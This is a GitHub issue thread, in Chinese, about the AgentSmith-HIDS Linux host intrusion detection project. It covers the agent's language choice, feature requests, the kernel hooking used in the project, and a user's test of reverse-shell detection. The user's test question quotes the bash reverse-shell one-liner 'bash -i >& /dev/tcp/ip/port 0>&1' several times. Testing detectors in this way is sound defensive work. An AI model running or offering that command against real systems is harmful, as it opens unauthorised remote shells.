Skip to content
This repository has been archived by the owner on Apr 1, 2021. It is now read-only.

关于AgentSmith-HIDS后续迭代的问题 #10

Closed
EBWi11 opened this issue Aug 27, 2019 · 10 comments
Closed

关于AgentSmith-HIDS后续迭代的问题 #10

EBWi11 opened this issue Aug 27, 2019 · 10 comments
Assignees
Labels
question Further information is requested

Comments

@EBWi11
Copy link
Owner

EBWi11 commented Aug 27, 2019

(该issue是AgentSmith-HIDS作者所提,旨在能和大家保持一定的沟通,听取反馈,长期有效)

  1. 有一部分同学表示用户态Agent使用Rust导致一定难度,无法参与到新功能的研发中,调试也有一定困难,希望可以用GoLang替换。笔者也一部分认同该观点,且目前而言重构用户态Agent的工作还算简单,但是Rust作为一门无GC且内存安全的未来的系统级语言来说,还是有一定的优势的。不知道其他的小伙伴如何看待?
  2. 大家希望AgentSmith-HIDS什么在未来优先级较高的功能呢?可以留言交流。
  3. 有多少小伙伴使用AgentSmith-HIDS呢?是否在这个过程中遇到什么问题?无论是部署/测试/功能的问题,都欢迎提出来。

最后,个人以为,把README读完再进行提问应该是对他人时间的起码的尊重,你认为呢?

@EBWi11 EBWi11 added the question Further information is requested label Aug 27, 2019
@EBWi11 EBWi11 self-assigned this Aug 27, 2019
@EBWi11 EBWi11 pinned this issue Aug 27, 2019
@bingozilos
Copy link

bingozilos commented Sep 2, 2019

小白提问贴:不太熟悉linux内核编程,部分源码读起来有些吃力,是否考虑写一些文章略微解释下原理。比如在通过hook sys_execve获取到执行的命令及pid等信息后,执行这个命令的用户信息是从哪里获取的?

@EBWi11
Copy link
Owner Author

EBWi11 commented Sep 2, 2019

@bingozilos 好的,近期我会准备一篇文章介绍一下AgentSmith-HIDS的原理和一些开发过程中的坑,敬请期待。在这之前如果感兴趣可以看一些关于Linux LKM开发的文章,应该会比较有帮助。

@EBWi11
Copy link
Owner Author

EBWi11 commented Dec 8, 2019

目前已经去除golang版本的用户态agent。

@EBWi11 EBWi11 closed this as completed Jan 17, 2020
@wanglinhuiyong
Copy link

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

@AlkenePan
Copy link
Contributor

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

请附上你是如何使用的,清晰具体的问题会有让人回答的欲望。

@wanglinhuiyong
Copy link

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

请附上你是如何使用的,清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端,另一个作为被控端,我想在被控端能检测到反弹shell。于是按照https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明,在被控端安装了smith.ko及agent。当我在控制端监听某个端口,然后在被控端去连接它(bash -i >& /dev/tcp/ip/port 0>&1),我怎么知道有没有检测到反弹shell呢?从哪看到的呢?

@AlkenePan
Copy link
Contributor

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

请附上你是如何使用的,清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端,另一个作为被控端,我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明,在被控端安装了smith.ko及agent。当我在控制端监听某个端口,然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢?从哪看到的呢?

@wanglinhuiyong
Copy link

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

请附上你是如何使用的,清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端,另一个作为被控端,我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明,在被控端安装了smith.ko及agent。当我在控制端监听某个端口,然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢?从哪看到的呢?

@AlkenePan
Copy link
Contributor

请问应该怎么检测反弹shell呢,怎么得到检测反弹shell的结果呢?

请附上你是如何使用的,清晰具体的问题会有让人回答的欲望。

我在虚拟机下安装了两个Centos8; 其中一个作为控制端,另一个作为被控端,我想在被控端能检测到反弹shell。于是按照[https://github.com/EBWi11/AgentSmith-HIDS/blob/master/doc/AgentSmith-HIDS-Quick-Start.md这个说明,在被控端安装了smith.ko及agent。当我在控制端监听某个端口,然后在被控端去连接它bash-i >& /dev/tcp/ip/port 0>&1,我怎么知道有没有检测到反弹shell呢?从哪看到的呢?

LMGFY: https://www.google.com/search?q=kafka%20setup

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
question Further information is requested
Projects
None yet
Development

No branches or pull requests

4 participants